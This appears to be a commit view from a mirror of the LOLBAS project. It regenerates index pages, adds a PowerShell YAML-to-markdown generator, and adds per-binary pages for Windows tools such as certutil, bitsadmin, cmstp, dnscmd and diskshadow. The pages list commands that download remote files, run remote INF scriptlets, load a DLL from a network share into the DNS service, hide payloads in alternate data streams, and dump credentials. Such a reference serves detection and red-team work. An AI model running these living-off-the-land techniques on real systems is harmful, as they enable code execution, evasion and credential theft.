public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-10-22 16:49:11 +02:00
Code Issues Projects Releases Wiki Activity

MD files generate from Script, and adjustments to readme

Browse Source
This commit is contained in:
Oddvar Moe 2018-09-14 15:48:52 +02:00
parent eef9e78be8
commit c949e100bd
221 changed files with 2729 additions and 158 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

180
LOLBins.md
View File

@ -1,102 +1,100 @@
# LOLBins - Living Off The Land Binaries
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
# OS BINARIES
[Atbroker.exe](OSBinaries/Atbroker.md)
[Bash.exe](OSBinaries/Bash.md)
[Bitsadmin.exe](OSBinaries/Bitsadmin.md)
[Certutil.exe](OSBinaries/Certutil.md)
[Cmdkey.exe](OSBinaries/Cmdkey.md)
[Cmstp.exe](OSBinaries/Cmstp.md)
[Control.exe](OSBinaries/Control.md)
[Csc.exe](OSBinaries/Csc.md)
[Cscript.exe](OSBinaries/Cscript.md)
[Dfsvc.exe](OSBinaries/Dfsvc.md)
[Diskshadow.exe](OSBinaries/Diskshadow.md)
[Dnscmd.exe](OSBinaries/Dnscmd.md)
[Esentutl.exe](OSBinaries/Esentutl.md)
[Extexport.exe](OSBinaries/Extexport.md)
[Extrac32.exe](OSBinaries/Extrac32.md)
[Expand.exe](OSBinaries/Expand.md)
[Explorer.exe](OSBinaries/Explorer.md)
[Findstr.exe](OSBinaries/Findstr.md)
[Forfiles.exe](OSBinaries/Forfiles.md)
[Gpscript.exe](OSBinaries/Gpscript.md)
[Hh.exe](OSBinaries/Hh.md)
[Ieexec.exe](OSBinaries/Ieexec.md)
[Ie4unit.exe](OSBinaries/Ie4unit.md)
[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)
[Installutil.exe](OSBinaries/Installutil.md)
[Makecab.exe](OSBinaries/Makecab.md)
[Mavinject.exe](OSBinaries/Mavinject.md)
[Msbuild.exe](OSBinaries/Msbuild.md)
[Msconfig.exe](OSBinaries/Msconfig.md)
[Msdt.exe](OSBinaries/Msdt.md)
[Mshta.exe](OSBinaries/Mshta.md)
[Msiexec.exe](OSBinaries/Msiexec.md)
[Netsh.exe](OSBinaries/Netsh.md)
[Nltest.exe](OSBinaries/Nltest.md)
[Odbcconf.exe](OSBinaries/Odbcconf.md)
[Openwith.exe](OSBinaries/Openwith.md)
[Pcalua.exe](OSBinaries/Pcalua.md)
[Pcwrun.exe](OSBinaries/Pcwrun.md)
[Powershell.exe](OSBinaries/Powershell.md)
[Presentationhost.exe](OSBinaries/Presentationhost.md)
[Print.exe](OSBinaries/Print.md)
[Psr.exe](OSBinaries/Psr.md)
[Reg.exe](OSBinaries/Reg.md)
[Regedit.exe](OSBinaries/Regedit.md)
[Regasm.exe](OSBinaries/Regasm.md)
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
[Regsvcs.exe](OSBinaries/Regsvcs.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md)
[Replace.exe](OSBinaries/Replace.md)
[Robocopy.exe](OSBinaries/Robocopy.md)
[Rpcping.exe](OSBinaries/Rpcping.md)
[Rundll32.exe](OSBinaries/Rundll32.md)
[Runonce.exe](OSBinaries/Runonce.md)
[Runscripthelper.exe](OSBinaries/Runscripthelper.md)
[Sc.exe](OSBinaries/Sc.md)
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
[Wab.exe](OSBinaries/Wab.md)
[Wmic.exe](OSBinaries/Wmic.md)
[Wscript.exe](OSBinaries/Wscript.md)
[Xwizard.exe](OSBinaries/Xwizard.md)
[Atbroker.exe](OSBinaries/Atbroker.exe.md)
[Bash.exe](OSBinaries/Bash.exe.md)
[Bitsadmin.exe](OSBinaries/Bitsadmin.exe.md)
[Certutil.exe](OSBinaries/Certutil.exe.md)
[Cmdkey.exe](OSBinaries/Cmdkey.exe.md)
[Cmstp.exe](OSBinaries/Cmstp.exe.md)
[Control.exe](OSBinaries/Control.exe.md)
[Csc.exe](OSBinaries/Csc.exe.md)
[Cscript.exe](OSBinaries/Cscript.exe.md)
[Dfsvc.exe](OSBinaries/Dfsvc.exe.md)
[Diskshadow.exe](OSBinaries/Diskshadow.exe.md)
[Dnscmd.exe](OSBinaries/Dnscmd.exe.md)
[Esentutl.exe](OSBinaries/Esentutl.exe.md)
[Expand.exe](OSBinaries/Expand.exe.md)
[Explorer.exe](OSBinaries/Explorer.exe.md)
[Extexport.exe](OSBinaries/Extexport.exe.md)
[Extrac32.exe](OSBinaries/Extrac32.exe.md)
[Findstr.exe](OSBinaries/Findstr.exe.md)
[Forfiles.exe](OSBinaries/Forfiles.exe.md)
[Gpscript.exe](OSBinaries/Gpscript.exe.md)
[hh.exe](OSBinaries/hh.exe.md)
[Ie4unit.exe](OSBinaries/Ie4unit.exe.md)
[IEExec.exe](OSBinaries/IEExec.exe.md)
[InfDefaultInstall.exe](OSBinaries/InfDefaultInstall.exe.md)
[InstallUtil.exe](OSBinaries/InstallUtil.exe.md)
[Makecab.exe](OSBinaries/Makecab.exe.md)
[Mavinject.exe](OSBinaries/Mavinject.exe.md)
[Msbuild.exe](OSBinaries/Msbuild.exe.md)
[Msconfig.exe](OSBinaries/Msconfig.exe.md)
[Msdt.exe](OSBinaries/Msdt.exe.md)
[mshta.exe](OSBinaries/mshta.exe.md)
[Msiexec.exe](OSBinaries/Msiexec.exe.md)
[Netsh.exe](OSBinaries/Netsh.exe.md)
[Nltest.exe](OSBinaries/Nltest.exe.md)
[odbcconf.exe](OSBinaries/odbcconf.exe.md)
[Openwith.exe](OSBinaries/Openwith.exe.md)
[Pcalua.exe](OSBinaries/Pcalua.exe.md)
[Pcwrun.exe](OSBinaries/Pcwrun.exe.md)
[Powershell.exe](OSBinaries/Powershell.exe.md)
[PresentationHost.exe](OSBinaries/PresentationHost.exe.md)
[Print.exe](OSBinaries/Print.exe.md)
[Psr.exe](OSBinaries/Psr.exe.md)
[reg.exe](OSBinaries/reg.exe.md)
[Regasm.exe](OSBinaries/Regasm.exe.md)
[regedit.exe](OSBinaries/regedit.exe.md)
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.exe.md)
[Regsvcs.exe](OSBinaries/Regsvcs.exe.md)
[Regsvr32.exe](OSBinaries/Regsvr32.exe.md)
[Replace.exe](OSBinaries/Replace.exe.md)
[Robocopy.exe](OSBinaries/Robocopy.exe.md)
[Rpcping.exe](OSBinaries/Rpcping.exe.md)
[Rundll32.exe](OSBinaries/Rundll32.exe.md)
[Runonce.exe](OSBinaries/Runonce.exe.md)
[Runscripthelper.exe](OSBinaries/Runscripthelper.exe.md)
[SC.exe](OSBinaries/SC.exe.md)
[Scriptrunner.exe](OSBinaries/Scriptrunner.exe.md)
[SyncAppvPublishingServer.exe](OSBinaries/SyncAppvPublishingServer.exe.md)
[Wab.exe](OSBinaries/Wab.exe.md)
[WMIC.exe](OSBinaries/WMIC.exe.md)
[Wscript.exe](OSBinaries/Wscript.exe.md)
[Xwizard.exe](OSBinaries/Xwizard.exe.md)
# OTHER MICROSOFT SIGNED BINARIES
[Appvlp.exe](OtherMSBinaries/Appvlp.md)
[Bginfo.exe](OtherMSBinaries/Bginfo.md)
[Cdb.exe](OtherMSBinaries/Cdb.md)
[Csi.exe](OtherMSBinaries/Csi.md)
[Dnx.exe](OtherMSBinaries/Dnx.md)
[Dxcap.exe](OtherMSBinaries/Dxcap.md)
[Mftrace.exe](OtherMSBinaries/Mftrace.md)
[Msdeploy.exe](OtherMSBinaries/Msdeploy.md)
[Msxsl.exe](OtherMSBinaries/Msxsl.md)
[Rcsi.exe](OtherMSBinaries/Rcsi.md)
[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)
[Sqlps.exe](OtherMSBinaries/Sqlps.md)
[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)
[Te.exe](OtherMSBinaries/Te.md)
[Tracker.exe](OtherMSBinaries/Tracker.md)
[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)
[Winword.exe](OtherMSBinaries/Winword.md)
[Appvlp.exe](OtherMSBinaries/Appvlp.exe.md)
[Bginfo.exe](OtherMSBinaries/Bginfo.exe.md)
[Cdb.exe](OtherMSBinaries/Cdb.exe.md)
[csi.exe](OtherMSBinaries/csi.exe.md)
[dnx.exe](OtherMSBinaries/dnx.exe.md)
[Dxcap.exe](OtherMSBinaries/Dxcap.exe.md)
[Mftrace.exe](OtherMSBinaries/Mftrace.exe.md)
[Msdeploy.exe](OtherMSBinaries/Msdeploy.exe.md)
[msxsl.exe](OtherMSBinaries/msxsl.exe.md)
[rcsi.exe](OtherMSBinaries/rcsi.exe.md)
[Sqldumper.exe](OtherMSBinaries/Sqldumper.exe.md)
[Sqlps.exe](OtherMSBinaries/Sqlps.exe.md)
[SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.exe.md)
[te.exe](OtherMSBinaries/te.exe.md)
[Tracker.exe](OtherMSBinaries/Tracker.exe.md)
[vsjitdebugger.exe](OtherMSBinaries/vsjitdebugger.exe.md)
[winword.exe](OtherMSBinaries/winword.exe.md)
# OTHER NON MICROSOFT BINARIES
[AcroRd32.exe](OtherBinaries/AcroRd32.md)
[Gpup.exe](OtherBinaries/Gpup.md)
[Nlnotes.exe](OtherBinaries/Nlnotes.md)
[Notes.exe](OtherBinaries/Notes.md)
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.md)
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)
[Usbinst.exe](OtherBinaries/Usbinst.md)
[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.md)
[Setup.exe](OtherBinaries/Setup.md) - Launches HP Installer for HP LaserJet Enterprise 700 color MFP M775 Printer Series Full Software and Drivers
[AcroRd32.exe](OtherBinaries/AcroRd32.exe.md)
[Gpup.exe](OtherBinaries/Gpup.exe.md)
[Nlnotes.exe](OtherBinaries/Nlnotes.exe.md)
[Notes.exe](OtherBinaries/Notes.exe.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.exe.md)
[Nvuhda6.exe](OtherBinaries/Nvuhda6.exe.md)
[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.exe.md)
[Setup.exe](OtherBinaries/Setup.exe.md)
[Usbinst.exe](OtherBinaries/Usbinst.exe.md)
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.exe.md)

34
LOLLibs.md
View File

@ -1,25 +1,15 @@
# LOLLibs - Living Off The Land Libraries
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
# OS LIBRARIES
[Advpack.dll](OSLibraries/Advpack.md)
[Ieadvpack.dll](OSLibraries/Ieadvpack.md)
[Ieframe.dll](OSLibraries/Ieframe.md)
[Mshtml.dll](OSLibraries/Mshtml.md)
[Pcwutl.dll](OSLibraries/Pcwutl.md)
[Shdocvw.dll](OSLibraries/Shdocvw.md)
[Zipfldr.dll](OSLibraries/Zipfldr.md)
[Shell32.dll](OSLibraries/Shell32.md)
[Setupapi.dll](OSLibraries/Setupapi.md)
[Url.dll](OSLibraries/Url.md)
[Zipfldr.dll](OSLibraries/Zipfldr.md)
# OTHER MICROSOFT SIGNED LIBRARIES
# OTHER NON MICROSOFT LIBRARIES
[Advpack.dll](OSLibraries/Advpack.dll.md)
[Ieadvpack.dll](OSLibraries/Ieadvpack.dll.md)
[Ieframe.dll](OSLibraries/Ieframe.dll.md)
[Mshtml.dll](OSLibraries/Mshtml.dll.md)
[Pcwutl.dll](OSLibraries/Pcwutl.dll.md)
[Setupapi.dll](OSLibraries/Setupapi.dll.md)
[Shdocvw.dll](OSLibraries/Shdocvw.dll.md)
[Shell32.dll](OSLibraries/Shell32.dll.md)
[Syssetup.dll](OSLibraries/Syssetup.dll.md)
[Url.dll](OSLibraries/Url.dll.md)
[Zipfldr.dll](OSLibraries/Zipfldr.dll.md)

28
LOLScripts.md
View File

@ -1,23 +1,17 @@
# LOLScripts - Living Off The Land Scripts
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
# OS SCRIPTS
[Cl_invocation.ps1](OSScrits/Cl_invocation.md)
[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)
[Manage-bde.vbs](OSScripts/Manage-bde.md)
[pester.bat](OSScripts/pester.md)
[Pubprn.vbs](OSScripts/Pubprn.md)
[Slmgr.vbs](OSScripts/Slmgr.md)
[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)
[Winrm.vbs](OSScripts/Winrm.md)
[CL_Invocation.ps1](OSSCripts/CL_Invocation.ps1.md)
[CL_Mutexverifiers.ps1](OSSCripts/CL_Mutexverifiers.ps1.md)
[Manage-bde.wsf](OSSCripts/Manage-bde.wsf.md)
[pester.bat](OSSCripts/pester.bat.md)
[Pubprn.vbs](OSSCripts/Pubprn.vbs.md)
[Slmgr.vbs](OSSCripts/Slmgr.vbs.md)
[SyncAppvPublishingServer.vbs](OSSCripts/SyncAppvPublishingServer.vbs.md)
[Winrm.vbs](OSSCripts/Winrm.vbs.md)
# OTHER MICROSOFT SIGNED SCRIPTS
# OTHER NON MICROSOFT BINARIES
[Testxlst.js](OtherScripts/Testxlst.md)
# OTHER NON MICROSOFT SCRIPTS
[testxlst.js](OtherScripts/testxlst.js.md)

261
Mgmt-Scripts/CreateMDFromYaml.ps1 Normal file
View File

@ -0,0 +1,261 @@
#A hacky script to convert YML to MD file the way I want
# Used primarly for generating MD files to the LOLBAS-Project site
#Author: Oddvar Moe
#If you can use it, be my guest!
$mainpath = "C:\data\gitprojects\LOLBAS"
function Convert-YamlToMD
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
$YamlObject,
[Parameter(Mandatory=$true)]
[String]
$Outfile
)
Begin
{
}
Process
{
# Header
"`#`# $($YamlObject.Name)" | Add-Content $Outfile
"* Functions: $($YamlObject.Description)" | Add-Content $Outfile
"``````" | Add-Content $Outfile
foreach($cmd in $YamlObject.Commands)
{
"`n$($cmd.command)" | Add-Content $Outfile
"$($cmd.description)" | Add-Content $Outfile
}
"``````" | Add-Content $Outfile
" " | Add-Content $Outfile
"* Resources: " | Add-Content $Outfile
foreach($link in $YamlObject.Resources)
{
" * $($link)" | Add-Content $Outfile
}
" " | Add-Content $Outfile
"* Full path: " | Add-Content $Outfile
foreach($path in $YamlObject.'Full path')
{
" * $($path)" | Add-Content $outfile
}
" " | Add-Content $Outfile
"* Notes: $($YamlObject.Notes) " | Add-Content $Outfile
" " | Add-Content $Outfile
}
End
{
}
}
function Add-MainIndex
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
$YamlObject,
[Parameter(Mandatory=$true)]
[String]
$Outfile,
[Parameter(Mandatory=$true)]
[String]
$Type
)
Begin
{
}
Process
{
# Header
# OS BINARIES
#[Atbroker.exe](OSBinaries/Atbroker.md)
if($Type -eq "OSBinaries") {
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
}
if($Type -eq "OSLibraries") {
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
}
if($Type -eq "OSScripts") {
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
}
if($Type -eq "OtherBinaries") {
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
}
if($Type -eq "OtherMSBinaries") {
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
}
if($Type -eq "OtherScripts") {
"`[$($YamlObject.Name)`]`($Type/$($YamlObject.Name).md`)" | Add-Content $Outfile
}
#"" | Add-Content $Outfile
}
End
{
}
}
function New-MainIndex
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
[String]
$Outfile,
[Parameter(Mandatory=$true)]
[String]
$Type
)
Begin
{
}
Process
{
if($Type -eq "OSBinaries") {
"`# LOLBins - Living Off The Land Binaries" | Add-Content $Outfile
"Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). " | Add-Content $Outfile
" " | Add-Content $Outfile
"`# OS BINARIES" | Add-Content $Outfile
}
if($Type -eq "OtherMSBinaries") {
" " | Add-content $Outfile
" " | Add-content $Outfile
" " | Add-content $Outfile
"`# OTHER MICROSOFT SIGNED BINARIES" | Add-Content $Outfile
}
if($Type -eq "OtherBinaries") {
" " | Add-content $Outfile
" " | Add-content $Outfile
" " | Add-content $Outfile
"`# OTHER NON MICROSOFT BINARIES" | Add-Content $Outfile
}
if($Type -eq "OSScripts") {
"`# LOLScripts - Living Off The Land Scripts" | Add-Content $Outfile
"Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). " | Add-Content $Outfile
" " | Add-Content $Outfile
"`# OS SCRIPTS" | Add-Content $Outfile
}
if($Type -eq "OtherScripts") {
" " | Add-content $Outfile
" " | Add-content $Outfile
" " | Add-content $Outfile
"`# OTHER NON MICROSOFT SCRIPTS" | Add-Content $Outfile
}
if($Type -eq "OSLibraries") {
"`# LOLLibs - Living Off The Land Libraries" | Add-Content $Outfile
"Please contribute and do point out errors or resources I have forgotten. If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose). " | Add-Content $Outfile
" " | Add-Content $Outfile
"`# OS LIBRARIES" | Add-Content $Outfile
}
}
End
{
}
}
function Invoke-GenerateMD
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
[String]
$Ymlpath,
[Parameter(Mandatory=$true)]
[String]
$Outpath,
[Parameter(Mandatory=$true)]
[String]
$indexfile
)
Begin
{
}
Process
{
#Initialize index files
New-MainIndex -Type $($Outpath.Split("\")[-1]) -Outfile $indexfile
# Read yaml files
$bins = @()
cd
get-childitem -Path $Ymlpath -File | foreach{
Write-Verbose "Add yamls to array"
write-verbose $_
[string[]]$fileContent = Get-Content $_.FullName
$content = ''
foreach ($line in $fileContent) { $content = $content + "`n" + $line }
$yaml = ConvertFrom-YAML $content
$bins += $yaml
}
$bins | foreach{
Write-Verbose "Converting files to yaml"
write-verbose "$($_.name)"
Convert-YamlToMD -YamlObject $_ -Outfile "$Outpath\$($_.name).md"
Add-MainIndex -YamlObject $_ -Outfile $indexfile -Type $($Outpath.Split("\")[-1])
}
}
End
{
}
}
#Generate the stuff!
#Bins
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "$mainpath\OSBinaries" -indexfile "$mainpath\LOLBins.md" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "$mainpath\OtherMSBinaries" -indexfile "$mainpath\LOLBins.md" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherBinaries" -Outpath "$mainpath\OtherBinaries" -indexfile "$mainpath\LOLBins.md" -Verbose
#Scripts
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "$mainpath\OSSCripts" -indexfile "$mainpath\LOLScripts.md" -Verbose
Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherScripts" -Outpath "$mainpath\OtherScripts" -indexfile "$mainpath\LOLScripts.md" -Verbose
#Libs
Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "$mainpath\OSLibraries" -indexfile "$mainpath\LOLLibs.md" -Verbose

18
OSBinaries/Atbroker.exe.md Normal file
View File

@ -0,0 +1,18 @@
## Atbroker.exe
* Functions: Execute
```
ATBroker.exe /start malware
Start a registered Assistive Technology (AT).
```
* Resources:
* http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
* Full path:
* C:\Windows\System32\Atbroker.exe
* C:\Windows\SysWOW64\Atbroker.exe
* Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.

16
OSBinaries/Bash.exe.md Normal file
View File

@ -0,0 +1,16 @@
## Bash.exe
* Functions: Execute
```
bash.exe -c calc.exe
Execute calc.exe.
```
* Resources:
*
* Full path:
* ?
* Notes: Thanks to ?

40
OSBinaries/Bitsadmin.exe.md Normal file
View File

@ -0,0 +1,40 @@
## Bitsadmin.exe
* Functions: Execute, Download, Copy, Read ADS
```
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
```
* Resources:
* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
* https://www.youtube.com/watch?v=_8xJaaQlpBo
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\Windows\System32\bitsadmin.exe
* c:\Windows\SysWOW64\bitsadmin.exe
* Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe

26
OSBinaries/Certutil.exe.md Normal file
View File

@ -0,0 +1,26 @@
## Certutil.exe
* Functions: Download, Add ADS, Decode, Encode
```
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Download and save a PS1 file to an Alternate Data Stream (ADS).
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Commands to encode and decode a file using Base64.
```
* Resources:
* https://twitter.com/Moriarty_Meng/status/984380793383370752
* https://twitter.com/mattifestation/status/620107926288515072
* Full path:
* c:\windows\system32\certutil.exe
* c:\windows\sysWOW64\certutil.exe
* Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016

17
OSBinaries/Cmdkey.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Cmdkey.exe
* Functions: Credentials
```
cmdkey /list
List cached credentials.
```
* Resources:
* https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
* Full path:
* c:\windows\system32\cmdkey.exe
* c:\windows\sysWOW64\cmdkey.exe
* Notes:

25
OSBinaries/Cmstp.exe.md Normal file
View File

@ -0,0 +1,25 @@
## Cmstp.exe
* Functions: Execute, UACBypass
```
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
```
* Resources:
* https://twitter.com/NickTyrer/status/958450014111633408
* https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
* https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
* https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
* https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass)
* https://github.com/hfiref0x/UACME
* Full path:
* C:\Windows\system32\cmstp.exe
* C:\Windows\sysWOW64\cmstp.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer

20
OSBinaries/Control.exe.md Normal file
View File

@ -0,0 +1,20 @@
## Control.exe
* Functions: Execute, Read ADS
```
control.exe c:\windows\tasks\file.txt:evil.dll
Execute evil.dll which is stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
* https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
* https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
* https://twitter.com/bohops/status/955659561008017409
* Full path:
* C:\Windows\system32\control.exe
* C:\Windows\sysWOW64\control.exe
* Notes: Thanks to Jimmy - @bohops

21
OSBinaries/Csc.exe.md Normal file
View File

@ -0,0 +1,21 @@
## Csc.exe
* Functions: Compile
```
csc -out:My.exe File.cs
Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
csc -target:library File.cs
```
* Resources:
* https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
*
* Full path:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
* Notes: Thanks to ?

18
OSBinaries/Cscript.exe.md Normal file
View File

@ -0,0 +1,18 @@
## Cscript.exe
* Functions: Execute, Read ADS
```
cscript c:\ads\file.txt:script.vbs
Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
```
* Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* c:\windows\system32\cscript.exe
* c:\windows\sysWOW64\cscript.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

19
OSBinaries/Dfsvc.exe.md Normal file
View File

@ -0,0 +1,19 @@
## Dfsvc.exe
* Functions: Execute
```
Missing Example
```
* Resources:
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
* Full path:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
* Notes: Thanks to Casey Smith - @subtee

20
OSBinaries/Diskshadow.exe.md Normal file
View File

@ -0,0 +1,20 @@
## Diskshadow.exe
* Functions: Execute, Dump NTDS.dit
```
diskshadow.exe /s c:\test\diskshadow.txt
Execute commands using diskshadow.exe from a prepared diskshadow script.
diskshadow> exec calc.exe
Execute a calc.exe using diskshadow.exe.
```
* Resources:
* https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
* Full path:
* c:\windows\system32\diskshadow.exe
* c:\windows\sysWOW64\diskshadow.exe
* Notes: Thanks to Jimmy - @bohops

26
OSBinaries/Dnscmd.exe.md Normal file
View File

@ -0,0 +1,26 @@
## Dnscmd.exe
* Functions: Execute
```
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
Adds a specially crafted DLL as a plug-in of the DNS Service.
```
* Resources:
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
* Full path:
* c:\windows\system32\Dnscmd.exe
* c:\windows\sysWOW64\Dnscmd.exe
* Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
Thanks to Shay Ber - ?,
Dimitrios Slamaris - @dim0x69,
Nikhil SamratAshok,
Mittal - @nikhil_mitt

32
OSBinaries/Esentutl.exe.md Normal file
View File

@ -0,0 +1,32 @@
## Esentutl.exe
* Functions: Copy, Download, Write ADS, Read ADS
```
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
Copies the source VBS file to the destination VBS file.
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
